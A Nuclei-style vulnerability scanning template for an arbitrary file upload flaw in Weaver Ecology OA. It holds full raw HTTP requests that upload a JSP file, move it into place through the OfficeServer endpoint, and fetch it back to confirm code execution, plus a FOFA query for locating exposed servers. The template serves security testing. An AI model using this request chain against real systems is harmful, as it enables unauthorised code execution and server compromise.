78 lines
2.9 KiB
YAML
Executable File
78 lines
2.9 KiB
YAML
Executable File
id: weaver-uploadoperation-file-upload
|
|
|
|
info:
|
|
name: Weaver OA Workrelate - Arbitary File Upload
|
|
author: SleepingBag945
|
|
severity: critical
|
|
description: |
|
|
Ecology contains an arbitrary file upload vulnerability. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code, As a result, an attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
|
reference:
|
|
- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
|
|
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/weaver-oa-workrelate-file-upload.yaml
|
|
metadata:
|
|
max-request: 3
|
|
fofa-query: app="泛微-协同办公OA"
|
|
tags: ecology,fileupload,intrusive
|
|
variables:
|
|
filename: "{{to_lower(rand_base(5))}}"
|
|
string: "{{randstr}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1
|
|
Host: {{Hostname}}
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
|
|
Accept: */*
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVdb2RRl25PuaGhWj
|
|
Accept-Encoding: gzip
|
|
|
|
------WebKitFormBoundaryVdb2RRl25PuaGhWj
|
|
Content-Disposition: form-data; name="secId"
|
|
|
|
1
|
|
------WebKitFormBoundaryVdb2RRl25PuaGhWj
|
|
Content-Disposition: form-data; name="Filedata"; filename="{{filename}}.jsp"
|
|
|
|
<%out.println("{{string}}");%>
|
|
------WebKitFormBoundaryVdb2RRl25PuaGhWj
|
|
Content-Disposition: form-data; name="plandetailid"
|
|
|
|
1
|
|
------WebKitFormBoundaryVdb2RRl25PuaGhWj--
|
|
- |
|
|
POST /OfficeServer HTTP/1.1
|
|
Host: {{Hostname}}
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
|
|
Accept: */*
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVdb2RRl25PuaGhWj
|
|
Accept-Encoding: gzip
|
|
|
|
------WebKitFormBoundaryVdb2RRl25PuaGhWj
|
|
Content-Disposition: form-data; name="aaa"
|
|
|
|
{"OPTION":"INSERTIMAGE","isInsertImageNew":"1","imagefileid4pic":"{{fileid}}"}
|
|
------WebKitFormBoundaryVdb2RRl25PuaGhWj--
|
|
- |
|
|
GET /{{filename}}.jsp HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: fileid
|
|
internal: true
|
|
group: 1
|
|
regex:
|
|
- "&fileid=(.*?)\\'>"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "status_code_1 == 200 && contains(body_1,'workrelate/plan/util/ViewDoc')"
|
|
- "status_code_2 == 200 && contains(body_2, 'println')"
|
|
- "status_code_3 == 200 && contains(body_3,'{{string}}')"
|
|
condition: and
|
|
|
|
# digest: 4a0a00473045022100842d0c47c12fe663e3da34832c889d568c8fffb3740648bbccc968954dd1c6e40220140f9f9b1d82e205c7bbcb715d2bfb99c4513d6cc842990a9618fd21e4c97721:922c64590222798bb761d5b6d8e72950
|